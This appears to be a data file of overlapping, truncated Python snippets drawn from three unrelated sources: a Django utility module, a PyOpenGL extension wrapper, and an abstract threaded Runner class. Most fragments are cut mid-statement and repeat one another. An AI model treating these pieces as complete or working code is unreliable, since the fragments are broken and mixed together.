"birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1,",
"1800 + y else: year = int(date.today().year / 100) * 100 + y",
"current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val)))",
"in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\"))",
"-= 100 month = int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return",
"try: # support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat",
"merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name for f in source._meta.fields",
"spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode())",
"settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]):",
"< 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\"",
"return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)]",
"), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except",
"target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user",
"django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ from .conf import settings",
"% len(stringset)] for i in [ord(x) for x in os.urandom(length)]]) def current_url(request): if",
"in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target})",
"s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val",
"for non integer values if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"])",
"settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query =",
"tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save()",
"= merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for mr",
"def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return",
"in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return",
"locale import os import re import string import unicodedata import zlib from datetime",
"url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE",
"leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\",",
"= localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s",
"\"<\" + s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes",
"return today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s else",
"import ugettext_lazy as _ from .conf import settings MALE = \"m\" FEMALE =",
"lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ from .conf",
"python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the currency settings",
"import string import unicodedata import zlib from datetime import date from urllib.parse import",
"to the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups",
"locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse()",
"\"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0:",
"tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target",
"if sign_pos == 0: s = \"(\" + s + \")\" elif sign_pos",
"merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for mr in",
"request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back):",
"tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for",
"if nothing specified; # this should be the most fitting sign position s",
"\"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if",
"sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos == 4: s =",
"s else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name",
"ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today: return",
"parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls",
"source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items):",
".conf import settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This",
"y < 54: year = 1900 + y else: year = 1800 +",
"s = \"(\" + s + \")\" elif sign_pos == 1: s ="
] |
[
"import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import",
"allows applications to easily encode signed data into unsigned texture formats. The functionality",
"contained signed data (in the range [-1,+1]). This allows applications to easily encode",
"to provide a more Python-friendly API Overview (from the spec) This extension provides",
"is nearly identical to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension,",
"remapping mode provided in the NV_register_combiners extension, although it applies even if register",
"arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets",
"boolean indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension(",
"range [0,1]) can be treated as though they contained signed data (in the",
"OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def",
"constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types,",
"applies even if register combiners are used. The official definition of this extension",
"(in the range [-1,+1]). This allows applications to easily encode signed data into",
"This module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly",
"signed data (in the range [-1,+1]). This allows applications to easily encode signed",
"from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating",
"provide a more Python-friendly API Overview (from the spec) This extension provides a",
"this extension is nearly identical to the EXPAND_NORMAL_NV remapping mode provided in the",
"unsigned texture components (in the range [0,1]) can be treated as though they",
"provided in the NV_register_combiners extension, although it applies even if register combiners are",
"mode provided in the NV_register_combiners extension, although it applies even if register combiners",
"spec) This extension provides a remapping mode where unsigned texture components (in the",
"texture components (in the range [0,1]) can be treated as though they contained",
"available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ### END AUTOGENERATED SECTION",
"this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ###",
"[-1,+1]). This allows applications to easily encode signed data into unsigned texture formats.",
"Overview (from the spec) This extension provides a remapping mode where unsigned texture",
"indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME",
"remapping mode where unsigned texture components (in the range [0,1]) can be treated",
"customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview",
"the spec) This extension provides a remapping mode where unsigned texture components (in",
"* from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension",
"extension provides a remapping mode where unsigned texture components (in the range [0,1])",
"_EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available''' from OpenGL",
"in the NV_register_combiners extension, although it applies even if register combiners are used.",
"This extension provides a remapping mode where unsigned texture components (in the range",
"behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from the",
"even if register combiners are used. The official definition of this extension is",
"components (in the range [0,1]) can be treated as though they contained signed",
"(from the spec) This extension provides a remapping mode where unsigned texture components",
"applications to easily encode signed data into unsigned texture formats. The functionality of",
"import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV():",
"from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME",
"OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether",
"as though they contained signed data (in the range [-1,+1]). This allows applications",
"from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from",
"OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from the spec) This extension",
"The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL",
"range [-1,+1]). This allows applications to easily encode signed data into unsigned texture",
"extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import *",
"more Python-friendly API Overview (from the spec) This extension provides a remapping mode",
"extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ### END",
"be treated as though they contained signed data (in the range [-1,+1]). This",
"are used. The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt '''",
"here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions,",
"although it applies even if register combiners are used. The official definition of",
"into unsigned texture formats. The functionality of this extension is nearly identical to",
"whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME )",
"a remapping mode where unsigned texture components (in the range [0,1]) can be",
"'''OpenGL extension NV.texture_expand_normal This module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide",
"glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available''' from OpenGL import extensions",
"extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from",
"extension, although it applies even if register combiners are used. The official definition",
"the NV_register_combiners extension, although it applies even if register combiners are used. The",
"_glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean",
"the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from the spec) This",
"The functionality of this extension is nearly identical to the EXPAND_NORMAL_NV remapping mode",
"the range [0,1]) can be treated as though they contained signed data (in",
"can be treated as though they contained signed data (in the range [-1,+1]).",
"the range [-1,+1]). This allows applications to easily encode signed data into unsigned",
"combiners are used. The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt",
"of this extension is nearly identical to the EXPAND_NORMAL_NV remapping mode provided in",
"easily encode signed data into unsigned texture formats. The functionality of this extension",
"OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from",
"API Overview (from the spec) This extension provides a remapping mode where unsigned",
"[0,1]) can be treated as though they contained signed data (in the range",
"'''Return boolean indicating whether this extension is available''' from OpenGL import extensions return",
"to easily encode signed data into unsigned texture formats. The functionality of this",
"where unsigned texture components (in the range [0,1]) can be treated as though",
"''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import",
"provides a remapping mode where unsigned texture components (in the range [0,1]) can",
"encode signed data into unsigned texture formats. The functionality of this extension is",
"used. The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from",
"texture formats. The functionality of this extension is nearly identical to the EXPAND_NORMAL_NV",
"http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper",
"mode where unsigned texture components (in the range [0,1]) can be treated as",
"EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although it applies even if",
"if register combiners are used. The official definition of this extension is available",
"signed data into unsigned texture formats. The functionality of this extension is nearly",
"ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import",
"this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays",
"from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes",
"def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available''' from OpenGL import",
"import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL",
"wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from",
"This allows applications to easily encode signed data into unsigned texture formats. The",
"extension is nearly identical to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners",
"module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API",
"to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although it applies",
"NV.texture_expand_normal This module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more",
"formats. The functionality of this extension is nearly identical to the EXPAND_NORMAL_NV remapping",
"OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal",
"data (in the range [-1,+1]). This allows applications to easily encode signed data",
"the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from",
"OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available'''",
"is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ### END AUTOGENERATED",
"functionality of this extension is nearly identical to the EXPAND_NORMAL_NV remapping mode provided",
"identical to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although it",
"register combiners are used. The official definition of this extension is available here:",
"platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import",
"a more Python-friendly API Overview (from the spec) This extension provides a remapping",
"they contained signed data (in the range [-1,+1]). This allows applications to easily",
"of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant,",
"_types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return",
"it applies even if register combiners are used. The official definition of this",
"from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is",
"definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform,",
"(in the range [0,1]) can be treated as though they contained signed data",
"NV_register_combiners extension, although it applies even if register combiners are used. The official",
"import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal",
"extension NV.texture_expand_normal This module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a",
"the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although it applies even",
"unsigned texture formats. The functionality of this extension is nearly identical to the",
"data into unsigned texture formats. The functionality of this extension is nearly identical",
"of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from the spec)",
"nearly identical to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although",
"Python-friendly API Overview (from the spec) This extension provides a remapping mode where",
"is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from OpenGL",
"available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from OpenGL import",
"import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available''' from",
"official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import",
"import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this",
"treated as though they contained signed data (in the range [-1,+1]). This allows",
"though they contained signed data (in the range [-1,+1]). This allows applications to"
] |
[
"base class, from which all Runners are derived. \"\"\" def __init__(self, callback, callback_context):",
"event is always END. # # The normal event sequence, which relates to",
"return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid)",
"elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return",
"- in response to a stop() STOPPED = auto() # The runner has",
"created, runs, completes and is then # automatically deleted is represented by the",
"class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event is always BEGIN.",
"# # The normal event sequence, which relates to a runner # that's",
"from enum import Enum, auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister'",
"block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This",
"initial state (assigned in begin()) PREPARING = auto() # The Runner is preparing",
"- it's # the responsibility of the implementing class. self._stopping = True print('End",
"= auto() # The Runner is Running COMPLETE = auto() # The Runner",
"self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will be supplied",
"metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners are derived. \"\"\" def",
"(Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping'",
"abstract _Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from collections import namedtuple",
"This method must only be called once. This method must not block. \"\"\"",
"% self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif",
"lifetime and are normally left to complete naturally. If the Runner is still",
"to be prematurely stopped. Runners have a built-in lifetime and are normally left",
"not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner.",
"'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners",
"def end(self): \"\"\"Stops the Runner. This method should be called only of a",
"'stopping' field (and change the state). # This should cause the main thread",
"threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner",
"preparing to run RUNNING = auto() # The Runner is Running COMPLETE =",
"enum import Enum, auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG",
"- RUNNING - COMPLETE - END BEGIN = auto() # The Runner initial",
"= auto() # The Runner initial state (assigned in begin()) PREPARING = auto()",
"is Running COMPLETE = auto() # The Runner has completed its actions (naturally)",
"#!/usr/bin/env python3 \"\"\"An abstract _Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from",
"RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user of each state",
"self._state_callback = callback self._callback_context = callback_context self._runner_state = None self._stopping = False self._runner_uuid",
"= callback_context self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4() # A",
"runner # that's successfully created, runs, completes and is then # automatically deleted",
"None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should be called only",
"= auto() # The Runner has completed its actions (naturally) STOPPING = auto()",
"callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def",
"class, from which all Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The",
"Runner is still running this method introduces the ``RunnerState`` values of ``STOPPING`` and",
"# BEGIN - PREPARING - RUNNING - COMPLETE - END BEGIN = auto()",
"of a Runner is to be prematurely stopped. Runners have a built-in lifetime",
"as the first argument # in the callback method. assert self._state_callback rso =",
"There has been a problem END = auto() # The last event, issued",
"callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback",
"abc import ABCMeta, abstractmethod from collections import namedtuple from enum import Enum, auto,",
"(already in progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring",
"runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user of",
"if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif self._runner_state in",
"BEGIN. # The last and final event is always END. # # The",
"(assigned in begin()) PREPARING = auto() # The Runner is preparing to run",
"to a runner # that's successfully created, runs, completes and is then #",
"RUNNING - COMPLETE - END BEGIN = auto() # The Runner initial state",
"{%s}' % (runner_state, self._runner_uuid)) # Inform the user of each state change. #",
"This should cause the main thread to exit - it's # the responsibility",
"be prematurely stopped. Runners have a built-in lifetime and are normally left to",
"A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self,",
"This method must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self):",
"has completed. This method must not block. \"\"\" print('End called... {%s}' % self._runner_uuid)",
"The receiver must expect a `RunnerStateTuple` as the first argument # in the",
"must expect a `RunnerStateTuple` as the first argument # in the callback method.",
"has been a problem END = auto() # The last event, issued when",
"that's successfully created, runs, completes and is then # automatically deleted is represented",
"first argument # in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context,",
"\"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}'",
"This method must not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping:",
"cause the main thread to exit - it's # the responsibility of the",
"callback self._callback_context = callback_context self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4()",
"\"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback)",
"- in response to a stop() FAILED = auto() # There has been",
"a problem END = auto() # The last event, issued when the runner's",
"stopped - in response to a stop() FAILED = auto() # There has",
"state_callback will be supplied with instances of the RunnerState as the runner progresses.",
"``STOPPING`` and ``STOPPED``, normally not seen. This method does nothing if the Runner",
"response to a stop() FAILED = auto() # There has been a problem",
"= auto() # The Runner is stopping - in response to a stop()",
"still running this method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally",
"self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif self._runner_state",
"last and final event is always END. # # The normal event sequence,",
"\"\"\"The ``Runner`` base class, from which all Runners are derived. \"\"\" def __init__(self,",
"self._runner_uuid)) # Inform the user of each state change. # The receiver must",
"state change. # The receiver must expect a `RunnerStateTuple` as the first argument",
"user. :param runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state,",
"auto() # There has been a problem END = auto() # The last",
"successfully created, runs, completes and is then # automatically deleted is represented by",
"main thread to exit - it's # the responsibility of the implementing class.",
"threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state = None self._stopping",
"(runner_state, self._runner_uuid)) # Inform the user of each state change. # The receiver",
"assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state = None self._stopping =",
"self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING)",
"assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts",
"in response to a stop() FAILED = auto() # There has been a",
"then # automatically deleted is represented by the following sequence: # # BEGIN",
"# The last and final event is always END. # # The normal",
"stop() STOPPED = auto() # The runner has stopped - in response to",
"= False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New",
"Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners are derived. \"\"\"",
"= runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user",
"a Runner is to be prematurely stopped. Runners have a built-in lifetime and",
"% self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change the",
"runner_state, msg=None): \"\"\"Sets the runner state and informs the user. :param runner_state: The",
"progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already",
"END = auto() # The last event, issued when the runner's gone RunnerStateTuple",
"is always END. # # The normal event sequence, which relates to a",
"auto() # The last event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner',",
"called once. This method must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN)",
"if the Runner is already stopping or has completed. This method must not",
"of ``STOPPING`` and ``STOPPED``, normally not seen. This method does nothing if the",
"self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets",
"be supplied with instances of the RunnerState as the runner progresses. This method",
"None self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock =",
"[RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just",
"The Runner is preparing to run RUNNING = auto() # The Runner is",
"synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state,",
"uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid)",
"expect a `RunnerStateTuple` as the first argument # in the callback method. assert",
"and ``STOPPED``, normally not seen. This method does nothing if the Runner is",
"a built-in lifetime and are normally left to complete naturally. If the Runner",
"assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should",
"introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen. This method",
"of each state change. # The receiver must expect a `RunnerStateTuple` as the",
"(%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user of each state change.",
"namedtuple from enum import Enum, auto, unique import threading import uuid RUNNER_IMAGE =",
"# The receiver must expect a `RunnerStateTuple` as the first argument # in",
"state (assigned in begin()) PREPARING = auto() # The Runner is preparing to",
"gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and",
"runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner``",
"'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The",
"its actions (naturally) STOPPING = auto() # The Runner is stopping - in",
"the main thread to exit - it's # the responsibility of the implementing",
"{%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change",
"{%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return",
"# The first event is always BEGIN. # The last and final event",
"normally left to complete naturally. If the Runner is still running this method",
"the RunnerState as the runner progresses. This method must only be called once.",
"called only of a Runner is to be prematurely stopped. Runners have a",
"BEGIN = auto() # The Runner initial state (assigned in begin()) PREPARING =",
"print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state",
"= auto() # The last event, issued when the runner's gone RunnerStateTuple =",
"RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback",
"PREPARING = auto() # The Runner is preparing to run RUNNING = auto()",
"{%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs",
"method should be called only of a Runner is to be prematurely stopped.",
"is to be prematurely stopped. Runners have a built-in lifetime and are normally",
"callback_context self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation",
"uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states.",
"The first event is always BEGIN. # The last and final event is",
"The new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state =",
"the user of each state change. # The receiver must expect a `RunnerStateTuple`",
"is always BEGIN. # The last and final event is always END. #",
"print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user of each",
"already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field",
"the runner state and informs the user. :param runner_state: The new Runner state",
"``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' %",
"from collections import namedtuple from enum import Enum, auto, unique import threading import",
"a stop() STOPPED = auto() # The runner has stopped - in response",
